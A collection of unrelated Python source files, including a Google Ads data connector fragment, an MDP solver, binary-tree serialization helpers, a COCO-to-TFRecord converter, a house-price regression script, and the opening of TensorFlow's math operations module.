    # Each stream_slice contains the starting date of one time_unit-long interval
while start_date < end_date:
intervals.append({field: start_date.to_date_string()})
start_date = start_date.add(**{time_unit: 1})
return intervals
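# Illustrative sketch of the slicing behaviour (dates chosen arbitrarily):
#   chunk_date_range("2021-01-01", conversion_window=0, field="segments.date",
#                    end_date="2021-03-15", time_unit="months")
#   -> [{"segments.date": "2021-01-01"},
#       {"segments.date": "2021-02-01"},
#       {"segments.date": "2021-03-01"}]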
class GoogleAdsStream(Stream, ABC):
def __init__(self, api: GoogleAds):
self.google_ads_client = api
def get_query(self, stream_slice: Mapping[str, Any]) -> str:
query = GoogleAds.convert_schema_into_query(schema=self.get_json_schema(), report_name=self.name)
return query
def parse_response(self, response: SearchPager) -> Iterable[Mapping]:
for result in response:
yield self.google_ads_client.parse_single_result(self.get_json_schema(), result)
def read_records(self, sync_mode, stream_slice: Mapping[str, Any] = None, **kwargs) -> Iterable[Mapping[str, Any]]:
response = self.google_ads_client.send_request(self.get_query(stream_slice))
yield from self.parse_response(response)
class IncrementalGoogleAdsStream(GoogleAdsStream, ABC):
days_of_data_storage = None
cursor_field = "segments.date"
primary_key = None
time_unit = "months"
def __init__(self, start_date: str, conversion_window_days: int, **kwargs):
self.conversion_window_days = conversion_window_days
self._start_date = start_date
super().__init__(**kwargs)
    def stream_slices(self, stream_state: Mapping[str, Any] = None, **kwargs) -> Iterable[Optional[Mapping[str, Any]]]:
stream_state = stream_state or {}
start_date = stream_state.get(self.cursor_field) or self._start_date
return chunk_date_range(
start_date=start_date,
conversion_window=self.conversion_window_days,
field=self.cursor_field,
time_unit=self.time_unit,
days_of_data_storage=self.days_of_data_storage,
)
@staticmethod
def get_date_params(stream_slice: Mapping[str, Any], cursor_field: str, end_date: pendulum.datetime = None, time_unit: str = "months"):
end_date = end_date or pendulum.yesterday()
start_date = pendulum.parse(stream_slice.get(cursor_field))
if start_date > pendulum.now():
return start_date.to_date_string(), start_date.add(days=1).to_date_string()
end_date = min(end_date, pendulum.parse(stream_slice.get(cursor_field)).add(**{time_unit: 1}))
# Fix issue #4806, start date should always be lower than end date.
if start_date.add(days=1).date() >= end_date.date():
return start_date.add(days=1).to_date_string(), start_date.add(days=2).to_date_string()
return start_date.add(days=1).to_date_string(), end_date.to_date_string()
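    # Illustrative sketch (not from the original source; assumes the run date is well past
    # the slice date): get_date_params({"segments.date": "2021-01-01"}, "segments.date")
    # returns ("2021-01-02", "2021-02-01"): start shifted by one day, end one month later.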
def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]:
current_stream_state = current_stream_state or {}
# When state is none return date from latest record
if current_stream_state.get(self.cursor_field) is None:
current_stream_state[self.cursor_field] = latest_record[self.cursor_field]
return current_stream_state
date_in_current_stream = pendulum.parse(current_stream_state.get(self.cursor_field))
date_in_latest_record = pendulum.parse(latest_record[self.cursor_field])
current_stream_state[self.cursor_field] = (max(date_in_current_stream, date_in_latest_record)).to_date_string()
return current_stream_state
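    # Illustrative sketch: with state {"segments.date": "2021-05-01"} and a latest record
    # dated "2021-05-03", the updated state becomes {"segments.date": "2021-05-03"}.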
def get_query(self, stream_slice: Mapping[str, Any] = None) -> str:
start_date, end_date = self.get_date_params(stream_slice, self.cursor_field, time_unit=self.time_unit)
query = GoogleAds.convert_schema_into_query(
schema=self.get_json_schema(), report_name=self.name, from_date=start_date, to_date=end_date, cursor_field=self.cursor_field
)
return query
class Accounts(GoogleAdsStream):
"""
Accounts stream: https://developers.google.com/google-ads/api/fields/v8/customer
"""
primary_key = "customer.id"
class Campaigns(GoogleAdsStream):
"""
Campaigns stream: https://developers.google.com/google-ads/api/fields/v8/campaign
"""
primary_key = "campaign.id"
class AdGroups(GoogleAdsStream):
"""
AdGroups stream: https://developers.google.com/google-ads/api/fields/v8/ad_group
"""
primary_key = "ad_group.id"
class AdGroupAds(GoogleAdsStream):
"""
AdGroups stream: https://developers.google.com/google-ads/api/fields/v8/ad_group_ad
"""
primary_key = "ad_group_ad.ad.id"
class AccountPerformanceReport(IncrementalGoogleAdsStream):
"""
AccountPerformanceReport stream: https://developers.google.com/google-ads/api/fields/v8/customer
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#account_performance
"""
class AdGroupAdReport(IncrementalGoogleAdsStream):
"""
AdGroupAdReport stream: https://developers.google.com/google-ads/api/fields/v8/ad_group_ad
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#ad_performance
"""
class DisplayKeywordPerformanceReport(IncrementalGoogleAdsStream):
"""
DisplayKeywordPerformanceReport stream: https://developers.google.com/google-ads/api/fields/v8/display_keyword_view
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#display_keyword_performance
"""
class DisplayTopicsPerformanceReport(IncrementalGoogleAdsStream):
"""
DisplayTopicsPerformanceReport stream: https://developers.google.com/google-ads/api/fields/v8/topic_view
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#display_topics_performance
"""
class ShoppingPerformanceReport(IncrementalGoogleAdsStream):
"""
ShoppingPerformanceReport stream: https://developers.google.com/google-ads/api/fields/v8/shopping_performance_view
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#shopping_performance
"""
class UserLocationReport(IncrementalGoogleAdsStream):
"""
UserLocationReport stream: https://developers.google.com/google-ads/api/fields/v8/user_location_view
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#geo_performance
"""
class ClickView(IncrementalGoogleAdsStream):
"""
ClickView stream: https://developers.google.com/google-ads/api/reference/rpc/v8/ClickView
"""
time_unit = "days"
days_of_data_storage = 90
|
py | 1a346063a32269a72b6b626876310a584d2c6605 | '''
* Copyright (c) 2022 MouBieCat
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
'''
import tkinter as Win_Tk
from WindowAPI.WindowBuilder import Window_t
class SearchApplication(Window_t, object):
__searchText:Win_Tk.StringVar
def __init__(self) -> None:
'''
        Constructor
'''
super().__init__()
'''
        Represents a class with initialization functionality
'''
def _init_window(self) -> None:
'''
        Initialize window widgets (buttons, input fields)
'''
        self.set_title("拍賣場比價軟體")  # "Auction house price-comparison tool"
self.set_size("325x550", [ 325, 550, 325, 550 ])
def _init_variable(self) -> None:
'''
        Initialize window variables
'''
self.__searchText = Win_Tk.StringVar()
|
py | 1a34610de1d81861a53ae916ba227b34809dbd71 | """Markov Decision Processes (Chapter 17)
http://aima.cs.berkeley.edu/python/mdp.html
First we define an MDP, and the special case of a GridMDP, in which
states are laid out in a 2-dimensional grid. We also represent a policy
as a dictionary of {state:action} pairs, and a Utility function as a
dictionary of {state:number} pairs. We then define the value_iteration
and policy_iteration algorithms."""
import random
class MDP:
"""A Markov Decision Process, defined by an initial state, transition model,
and reward function. We also keep track of a gamma value, for use by
algorithms. The transition model is represented somewhat differently from
the text. Instead of T(s, a, s') being probability number for each
state/action/state triplet, we instead have T(s, a) return a list of (p, s')
pairs. We also keep track of the possible states, terminal states, and
actions for each state. [page 615]"""
def __init__(self, init, actlist, terminals, gamma=.9):
        # The original relied on update() from the AIMA utils module; assign directly instead.
        self.init, self.actlist, self.terminals, self.gamma = init, actlist, terminals, gamma
        self.states, self.reward = set(), {}
def R(self, state):
"Return a numeric reward for this state."
return self.reward[state]
def T(self, state, action):
"""Transition model. From a state and an action, return a list
of (result-state, probability) pairs."""
        if action is None:
return [(0.0, state)]
else:
return [(0.8, self.go(state, action)),
(0.1, self.go(state, turn_right(action))),
(0.1, self.go(state, turn_left(action)))]
def actions(self, state):
"""Set of actions that can be performed in this state. By default, a
fixed list of actions, except for terminal states. Override this
method if you need to specialize by state."""
if state in self.terminals:
return [None]
else:
return self.actlist
def value_iteration(mdp, epsilon=0.001):
"Solving an MDP by value iteration. [Fig. 17.4]"
U1 = dict([(s, 0) for s in mdp.states])
R, T, gamma = mdp.R, mdp.T, mdp.gamma
while True:
U = U1.copy()
delta = 0
for s in mdp.states:
U1[s] = R(s) + gamma * max([sum([p * U[s1] for (p, s1) in T(s, a)])
for a in mdp.actions(s)])
delta = max(delta, abs(U1[s] - U[s]))
if delta < epsilon * (1 - gamma) / gamma:
return U
def best_policy(mdp, U):
"""Given an MDP and a utility function U, determine the best policy,
as a mapping from state to action. (Equation 17.4)"""
pi = {}
for s in mdp.states:
pi[s] = argmax(mdp.actions(s), lambda a:expected_utility(a, s, U, mdp))
return pi
def expected_utility(a, s, U, mdp):
"The expected utility of doing a in state s, according to the MDP and U."
return sum([p * U[s1] for (p, s1) in mdp.T(s, a)])
#______________________________________________________________________________
def argmax(seq, fn):
"""Return an element with highest fn(seq[i]) score; tie goes to first one.
'to'
"""
best = seq[0]; best_score = fn(best)
for x in seq:
x_score = fn(x)
if x_score > best_score:
best, best_score = x, x_score
return best
def policy_iteration(mdp):
"Solve an MDP by policy iteration [Fig. 17.7]"
U = dict([(s, 0) for s in mdp.states])
pi = dict([(s, random.choice(mdp.actions(s))) for s in mdp.states])
while True:
U = policy_evaluation(pi, U, mdp)
unchanged = True
for s in mdp.states:
a = argmax(mdp.actions(s), lambda a: expected_utility(a,s,U,mdp))
if a != pi[s]:
pi[s] = a
unchanged = False
if unchanged:
return pi
def policy_evaluation(pi, U, mdp, k=20):
"""Return an updated utility mapping U from each state in the MDP to its
utility, using an approximation (modified policy iteration)."""
R, T, gamma = mdp.R, mdp.T, mdp.gamma
for i in range(k):
for s in mdp.states:
            U[s] = R(s) + gamma * sum([p * U[s1] for (p, s1) in T(s, pi[s])])
return U
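# Minimal usage sketch (not part of the original module; the 2-state MDP below is
# hypothetical). A concrete subclass populates `states` and `reward` and may override T().
#
#   class TwoState(MDP):
#       def __init__(self):
#           MDP.__init__(self, init='a', actlist=['go'], terminals=['b'], gamma=0.9)
#           self.states = {'a', 'b'}
#           self.reward = {'a': -0.1, 'b': 1.0}
#       def T(self, state, action):
#           return [(1.0, 'b')] if action else [(0.0, state)]
#
#   mdp = TwoState()
#   U = value_iteration(mdp)
#   pi = best_policy(mdp, U)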
|
py | 1a34612cc1ac80e33199ad273b014b753292bd4c | from .negative_float import NegativeFloatConverter
|
py | 1a346150a22f4846be3622381022014a5f61c88f | class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
def tree_serialize(root):
    # BFS (level-order) serialization; a None entry is recorded for every missing child.
    queue, arr = [root], []
while len(queue) != 0:
current = queue.pop(0)
if current is not None:
arr.append(current.val)
queue.append(current.left)
queue.append(current.right)
else:
arr.append(None)
return arr
def tree_deserialize(s: str):
s = s.replace('[', '').replace(']', '').replace('None', 'X').replace('null','X').replace(' ','')
data = [int(i) if i != 'X' else None for i in s.split(',')]
if len(data) % 2 == 0:
data.append(None)
if data[0] is None:
return None
root = TreeNode(int(data.pop(0)))
queue, index, length = [root], 0, len(data)
while index < length:
a = data[index]
b = data[index + 1]
index += 2
current = queue.pop(0)
if a is not None:
current.left = TreeNode(int(a))
queue.append(current.left)
if b is not None:
current.right = TreeNode(int(b))
queue.append(current.right)
return root
def tree_deserialize_from_list(arr: list):
    # Renamed so it no longer shadows the string-based tree_deserialize above; its body was
    # an exact duplicate apart from the initial str() conversion, so delegate instead.
    return tree_deserialize(str(arr))
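# Illustrative round trip (values chosen arbitrarily):
#   root = tree_deserialize("[1,2,3,None,4]")
#   tree_serialize(root)  # -> [1, 2, 3, None, 4, None, None, None, None]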
|
py | 1a3461900c27952aecb7be2e24f2e83049f72274 | # Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Convert raw COCO dataset to TFRecord format.
This scripts follows the label map decoder format and supports detection
boxes, instance masks and captions.
Example usage:
python create_coco_tf_record.py --logtostderr \
--image_dir="${TRAIN_IMAGE_DIR}" \
--image_info_file="${TRAIN_IMAGE_INFO_FILE}" \
--object_annotations_file="${TRAIN_ANNOTATIONS_FILE}" \
--caption_annotations_file="${CAPTION_ANNOTATIONS_FILE}" \
--output_file_prefix="${OUTPUT_DIR/FILE_PREFIX}" \
--num_shards=100
"""
import collections
import json
import logging
import os
from absl import app # pylint:disable=unused-import
from absl import flags
import numpy as np
from pycocotools import mask
import tensorflow as tf
import multiprocessing as mp
from official.vision.beta.data import tfrecord_lib
flags.DEFINE_boolean(
'include_masks', False, 'Whether to include instance segmentations masks '
'(PNG encoded) in the result. default: False.')
flags.DEFINE_string('image_dir', '', 'Directory containing images.')
flags.DEFINE_string(
'image_info_file', '', 'File containing image information. '
'Tf Examples in the output files correspond to the image '
'info entries in this file. If this file is not provided '
'object_annotations_file is used if present. Otherwise, '
'caption_annotations_file is used to get image info.')
flags.DEFINE_string(
'object_annotations_file', '', 'File containing object '
'annotations - boxes and instance masks.')
flags.DEFINE_string('caption_annotations_file', '', 'File containing image '
'captions.')
flags.DEFINE_string('output_file_prefix', '/tmp/train', 'Path to output file')
flags.DEFINE_integer('num_shards', 32, 'Number of shards for output file.')
FLAGS = flags.FLAGS
logger = tf.get_logger()
logger.setLevel(logging.INFO)
def coco_segmentation_to_mask_png(segmentation, height, width, is_crowd):
"""Encode a COCO mask segmentation as PNG string."""
run_len_encoding = mask.frPyObjects(segmentation, height, width)
binary_mask = mask.decode(run_len_encoding)
if not is_crowd:
binary_mask = np.amax(binary_mask, axis=2)
return tfrecord_lib.encode_binary_mask_as_png(binary_mask)
def coco_annotations_to_lists(bbox_annotations, id_to_name_map,
image_height, image_width, include_masks):
"""Convert COCO annotations to feature lists."""
data = dict((k, list()) for k in
['xmin', 'xmax', 'ymin', 'ymax', 'is_crowd',
'category_id', 'category_names', 'area'])
if include_masks:
data['encoded_mask_png'] = []
num_annotations_skipped = 0
for object_annotations in bbox_annotations:
(x, y, width, height) = tuple(object_annotations['bbox'])
if width <= 0 or height <= 0:
num_annotations_skipped += 1
continue
if x + width > image_width or y + height > image_height:
num_annotations_skipped += 1
continue
data['xmin'].append(float(x) / image_width)
data['xmax'].append(float(x + width) / image_width)
data['ymin'].append(float(y) / image_height)
data['ymax'].append(float(y + height) / image_height)
data['is_crowd'].append(object_annotations['iscrowd'])
category_id = int(object_annotations['category_id'])
data['category_id'].append(category_id)
data['category_names'].append(id_to_name_map[category_id].encode('utf8'))
data['area'].append(object_annotations['area'])
if include_masks:
data['encoded_mask_png'].append(
coco_segmentation_to_mask_png(object_annotations['segmentation'],
image_height, image_width,
object_annotations['iscrowd'])
)
return data, num_annotations_skipped
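# Illustrative sketch of the normalization above (made-up numbers): a COCO box
# [x=10, y=20, width=30, height=40] in an image of width 100 and height 200 becomes
# xmin=0.10, xmax=0.40, ymin=0.10, ymax=0.30.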
def bbox_annotations_to_feature_dict(
bbox_annotations, image_height, image_width, id_to_name_map, include_masks):
"""Convert COCO annotations to an encoded feature dict."""
data, num_skipped = coco_annotations_to_lists(
bbox_annotations, id_to_name_map, image_height, image_width,
include_masks)
feature_dict = {
'image/object/bbox/xmin':
tfrecord_lib.convert_to_feature(data['xmin']),
'image/object/bbox/xmax':
tfrecord_lib.convert_to_feature(data['xmax']),
'image/object/bbox/ymin':
tfrecord_lib.convert_to_feature(data['ymin']),
'image/object/bbox/ymax':
tfrecord_lib.convert_to_feature(data['ymax']),
'image/object/class/text':
tfrecord_lib.convert_to_feature(data['category_names']),
'image/object/class/label':
tfrecord_lib.convert_to_feature(data['category_id']),
'image/object/is_crowd':
tfrecord_lib.convert_to_feature(data['is_crowd']),
'image/object/area':
tfrecord_lib.convert_to_feature(data['area']),
}
if include_masks:
feature_dict['image/object/mask'] = (
tfrecord_lib.convert_to_feature(data['encoded_mask_png']))
return feature_dict, num_skipped
def encode_caption_annotations(caption_annotations):
captions = []
for caption_annotation in caption_annotations:
captions.append(caption_annotation['caption'].encode('utf8'))
return captions
def create_tf_example(image,
image_dir,
bbox_annotations=None,
id_to_name_map=None,
caption_annotations=None,
include_masks=False):
"""Converts image and annotations to a tf.Example proto.
Args:
image: dict with keys: [u'license', u'file_name', u'coco_url', u'height',
u'width', u'date_captured', u'flickr_url', u'id']
image_dir: directory containing the image files.
bbox_annotations:
list of dicts with keys: [u'segmentation', u'area', u'iscrowd',
u'image_id', u'bbox', u'category_id', u'id'] Notice that bounding box
coordinates in the official COCO dataset are given as [x, y, width,
height] tuples using absolute coordinates where x, y represent the
top-left (0-indexed) corner. This function converts to the format
expected by the Tensorflow Object Detection API (which is which is
[ymin, xmin, ymax, xmax] with coordinates normalized relative to image
size).
id_to_name_map: a dict mapping category IDs to string names.
caption_annotations:
list of dict with keys: [u'id', u'image_id', u'str'].
include_masks: Whether to include instance segmentations masks
(PNG encoded) in the result. default: False.
Returns:
example: The converted tf.Example
num_annotations_skipped: Number of (invalid) annotations that were ignored.
Raises:
ValueError: if the image pointed to by data['filename'] is not a valid JPEG
"""
image_height = image['height']
image_width = image['width']
filename = image['file_name']
image_id = image['id']
full_path = os.path.join(image_dir, filename)
with tf.io.gfile.GFile(full_path, 'rb') as fid:
encoded_jpg = fid.read()
feature_dict = tfrecord_lib.image_info_to_feature_dict(
image_height, image_width, filename, image_id, encoded_jpg, 'jpg')
num_annotations_skipped = 0
if bbox_annotations:
box_feature_dict, num_skipped = bbox_annotations_to_feature_dict(
bbox_annotations, image_height, image_width, id_to_name_map,
include_masks)
num_annotations_skipped += num_skipped
feature_dict.update(box_feature_dict)
if caption_annotations:
encoded_captions = encode_caption_annotations(caption_annotations)
feature_dict.update(
{'image/caption': tfrecord_lib.convert_to_feature(encoded_captions)})
example = tf.train.Example(features=tf.train.Features(feature=feature_dict))
return example, num_annotations_skipped
def _load_object_annotations(object_annotations_file):
"""Loads object annotation JSON file."""
with tf.io.gfile.GFile(object_annotations_file, 'r') as fid:
obj_annotations = json.load(fid)
images = obj_annotations['images']
id_to_name_map = dict((element['id'], element['name']) for element in
obj_annotations['categories'])
img_to_obj_annotation = collections.defaultdict(list)
logging.info('Building bounding box index.')
for annotation in obj_annotations['annotations']:
image_id = annotation['image_id']
img_to_obj_annotation[image_id].append(annotation)
missing_annotation_count = 0
for image in images:
image_id = image['id']
if image_id not in img_to_obj_annotation:
missing_annotation_count += 1
logging.info('%d images are missing bboxes.', missing_annotation_count)
return img_to_obj_annotation, id_to_name_map
def _load_caption_annotations(caption_annotations_file):
"""Loads caption annotation JSON file."""
with tf.io.gfile.GFile(caption_annotations_file, 'r') as fid:
caption_annotations = json.load(fid)
img_to_caption_annotation = collections.defaultdict(list)
logging.info('Building caption index.')
for annotation in caption_annotations['annotations']:
image_id = annotation['image_id']
img_to_caption_annotation[image_id].append(annotation)
missing_annotation_count = 0
images = caption_annotations['images']
for image in images:
image_id = image['id']
if image_id not in img_to_caption_annotation:
missing_annotation_count += 1
logging.info('%d images are missing captions.', missing_annotation_count)
return img_to_caption_annotation
def _load_images_info(images_info_file):
with tf.io.gfile.GFile(images_info_file, 'r') as fid:
info_dict = json.load(fid)
return info_dict['images']
def generate_annotations(images, image_dir,
img_to_obj_annotation=None,
img_to_caption_annotation=None, id_to_name_map=None,
include_masks=False):
"""Generator for COCO annotations."""
for image in images:
object_annotation = (img_to_obj_annotation.get(image['id'], None) if
img_to_obj_annotation else None)
    caption_annotation = (img_to_caption_annotation.get(image['id'], None) if
                          img_to_caption_annotation else None)
    yield (image, image_dir, object_annotation, id_to_name_map,
           caption_annotation, include_masks)
def _create_tf_record_from_coco_annotations(images_info_file,
image_dir,
output_path,
num_shards,
object_annotations_file=None,
caption_annotations_file=None,
include_masks=False):
"""Loads COCO annotation json files and converts to tf.Record format.
Args:
images_info_file: JSON file containing image info. The number of tf.Examples
in the output tf Record files is exactly equal to the number of image info
entries in this file. This can be any of train/val/test annotation json
files Eg. 'image_info_test-dev2017.json',
'instance_annotations_train2017.json',
'caption_annotations_train2017.json', etc.
image_dir: Directory containing the image files.
output_path: Path to output tf.Record file.
num_shards: Number of output files to create.
object_annotations_file: JSON file containing bounding box annotations.
caption_annotations_file: JSON file containing caption annotations.
include_masks: Whether to include instance segmentations masks
(PNG encoded) in the result. default: False.
"""
logging.info('writing to output path: %s', output_path)
images = _load_images_info(images_info_file)
img_to_obj_annotation = None
img_to_caption_annotation = None
id_to_name_map = None
if object_annotations_file:
img_to_obj_annotation, id_to_name_map = (
_load_object_annotations(object_annotations_file))
if caption_annotations_file:
img_to_caption_annotation = (
_load_caption_annotations(caption_annotations_file))
coco_annotations_iter = generate_annotations(
images, image_dir, img_to_obj_annotation, img_to_caption_annotation,
id_to_name_map=id_to_name_map, include_masks=include_masks)
num_skipped = tfrecord_lib.write_tf_record_dataset(
output_path, coco_annotations_iter, create_tf_example, num_shards)
logging.info('Finished writing, skipped %d annotations.', num_skipped)
def main(_):
assert FLAGS.image_dir, '`image_dir` missing.'
assert (FLAGS.image_info_file or FLAGS.object_annotations_file or
FLAGS.caption_annotations_file), ('All annotation files are '
'missing.')
if FLAGS.image_info_file:
images_info_file = FLAGS.image_info_file
elif FLAGS.object_annotations_file:
images_info_file = FLAGS.object_annotations_file
else:
images_info_file = FLAGS.caption_annotations_file
directory = os.path.dirname(FLAGS.output_file_prefix)
if not tf.io.gfile.isdir(directory):
tf.io.gfile.makedirs(directory)
_create_tf_record_from_coco_annotations(images_info_file, FLAGS.image_dir,
FLAGS.output_file_prefix,
FLAGS.num_shards,
FLAGS.object_annotations_file,
FLAGS.caption_annotations_file,
FLAGS.include_masks)
if __name__ == '__main__':
app.run(main)
|
py | 1a34632da3bc2fb841899232fdd517b49ae50a67 | import pandas as pd
import numpy as np
import pickle
import json
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import ShuffleSplit
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import Lasso
from sklearn.tree import DecisionTreeRegressor
def find_best_model_using_gridsearchcv(X, y):
algos = {
'linear_regression': {
'model': LinearRegression(),
'params': {
'normalize': [True, False]
}
},
'lasso': {
'model': Lasso(),
'params': {
'alpha': [1,2],
'selection': ['random', 'cyclic']
}
},
'decision_tree': {
'model': DecisionTreeRegressor(),
'params': {
'criterion': ['mse', 'friedman_mse'],
'splitter': ['best', 'random']
}
}
}
scores = []
cv = ShuffleSplit(n_splits=5, test_size=0.2, random_state=0)
for algo_name, config in algos.items():
gs = GridSearchCV(config['model'], config['params'], cv=cv, return_train_score=False)
gs.fit(X,y)
scores.append({
'model': algo_name,
'best_score': gs.best_score_,
'best_params': gs.best_params_
})
return pd.DataFrame(scores, columns=['model', 'best_score', 'best_params'])
def predict_price(location, sqft, bath, bhk):
    # Note: np.where(...)[0][0] raises IndexError for an unknown location,
    # so loc_index is always >= 0 when the lookup succeeds.
    loc_index = np.where(X.columns == location)[0][0]
# print(loc_index, type(loc_index))
x = np.zeros(len(X.columns))
x[0] = sqft
x[1] = bath
x[2] = bhk
if loc_index >= 0:
x[loc_index] = 1
return lr_clf.predict([x])[0]
df = pd.read_csv('data_file_cleaned_feateng_outrem.csv')
print(df.head())
print(df.shape)
# The location variable is textual, but needs to be numeric for model training
# You can use one hot encoding or dummy variables
dummies = pd.get_dummies(df.location)
df2 = pd.concat([df, dummies.drop('other', axis = 'columns')], axis = 'columns')
# Remember to avoid dummy variable trap, we need to drop one column (in this case 'other')
print(df2.head())
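# Illustrative sketch of the encoding (hypothetical values, not from this dataset):
#   pd.get_dummies(pd.Series(['A', 'B', 'other']))
#        A  B  other
#   0    1  0      0
#   1    0  1      0
#   2    0  0      1
# Dropping the 'other' column avoids the dummy variable trap; an all-zero row of dummies
# then implicitly represents 'other'.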
# Now separate your features from your target
X = df2.drop(['location', 'price'], axis = 'columns')
print(df.total_sqft)
print(df.isnull().sum())
y = df2.price
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=10)
lr_clf = LinearRegression()
lr_clf.fit(X_train, y_train)
print(lr_clf.score(X_test, y_test))
# I'm getting a score of 65% which isn't that great
# In practice, we try multiple models and see what works
# We can do a k-fold cross validation
cv = ShuffleSplit(n_splits=5, test_size = 0.2, random_state=0)
cv_scores = cross_val_score(LinearRegression(), X, y, cv=cv)
print(cv_scores)
# What about other regression techniques?
# Here, we need a gridsearch cv (in the massive function at the top)
resultant = find_best_model_using_gridsearchcv(X, y)
print(resultant)
# I wonder if this can be improved by keeping the price in rupees
print(predict_price('1st Phase JP Nagar', 1000, 2, 2))
print(predict_price('1st Phase JP Nagar', 1000, 3, 3))
print(predict_price('Indira Nagar', 1000, 2, 2))
print(predict_price('Indira Nagar', 1000, 3, 3))
# Now we can export the data by pickling
# We also need the column index from our encoding
with open('bangalore_home_prices_model.pickle', 'wb') as f:
pickle.dump(lr_clf, f)
columns = {
'data_columns': [col.lower() for col in X.columns]
}
with open('columns.json', 'w') as f:
f.write(json.dumps(columns))
|
py | 1a34634cf2816a88d12c2cc4e664980ce8fbd704 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Note: Elementwise binary operations in TensorFlow follow [numpy-style
broadcasting](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html).
## Arithmetic Operators
TensorFlow provides several operations that you can use to add basic arithmetic
operators to your graph.
@@add
@@sub
@@mul
@@scalar_mul
@@div
@@truediv
@@floordiv
@@mod
@@cross
## Basic Math Functions
TensorFlow provides several operations that you can use to add basic
mathematical functions to your graph.
@@add_n
@@abs
@@neg
@@sign
@@inv
@@square
@@round
@@sqrt
@@rsqrt
@@pow
@@exp
@@log
@@ceil
@@floor
@@maximum
@@minimum
@@cos
@@sin
@@lbeta
@@tan
@@acos
@@asin
@@atan
@@lgamma
@@digamma
@@erf
@@erfc
@@squared_difference
@@igamma
@@igammac
@@zeta
@@polygamma
@@betainc
## Matrix Math Functions
TensorFlow provides several operations that you can use to add linear algebra
functions on matrices to your graph.
@@diag
@@diag_part
@@trace
@@transpose
@@eye
@@matrix_diag
@@matrix_diag_part
@@matrix_band_part
@@matrix_set_diag
@@matrix_transpose
@@matmul
@@batch_matmul
@@matrix_determinant
@@matrix_inverse
@@cholesky
@@cholesky_solve
@@matrix_solve
@@matrix_triangular_solve
@@matrix_solve_ls
@@self_adjoint_eig
@@self_adjoint_eigvals
@@svd
## Complex Number Functions
TensorFlow provides several operations that you can use to add complex number
functions to your graph.
@@complex
@@complex_abs
@@conj
@@imag
@@real
## Fourier Transform Functions
TensorFlow provides several operations that you can use to add discrete
Fourier transform functions to your graph.
@@fft
@@ifft
@@fft2d
@@ifft2d
@@fft3d
@@ifft3d
## Reduction
TensorFlow provides several operations that you can use to perform
common math computations that reduce various dimensions of a tensor.
@@reduce_sum
@@reduce_prod
@@reduce_min
@@reduce_max
@@reduce_mean
@@reduce_all
@@reduce_any
@@reduce_logsumexp
@@count_nonzero
@@accumulate_n
@@einsum
## Scan
TensorFlow provides several operations that you can use to perform scans
(running totals) across one axis of a tensor.
@@cumsum
@@cumprod
## Segmentation
TensorFlow provides several operations that you can use to perform common
math computations on tensor segments.
Here a segmentation is a partitioning of a tensor along
the first dimension, i.e. it defines a mapping from the first dimension onto
`segment_ids`. The `segment_ids` tensor should be the size of
the first dimension, `d0`, with consecutive IDs in the range `0` to `k`,
where `k<d0`.
In particular, a segmentation of a matrix tensor is a mapping of rows to
segments.
For example:
```python
c = tf.constant([[1,2,3,4], [-1,-2,-3,-4], [5,6,7,8]])
tf.segment_sum(c, tf.constant([0, 0, 1]))
==> [[0 0 0 0]
[5 6 7 8]]
```
@@segment_sum
@@segment_prod
@@segment_min
@@segment_max
@@segment_mean
@@unsorted_segment_sum
@@sparse_segment_sum
@@sparse_segment_mean
@@sparse_segment_sqrt_n
## Sequence Comparison and Indexing
TensorFlow provides several operations that you can use to add sequence
comparison and index extraction to your graph. You can use these operations to
determine sequence differences and determine the indexes of specific values in
a tensor.
@@argmin
@@argmax
@@listdiff
@@where
@@unique
@@edit_distance
@@invert_permutation
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import ops
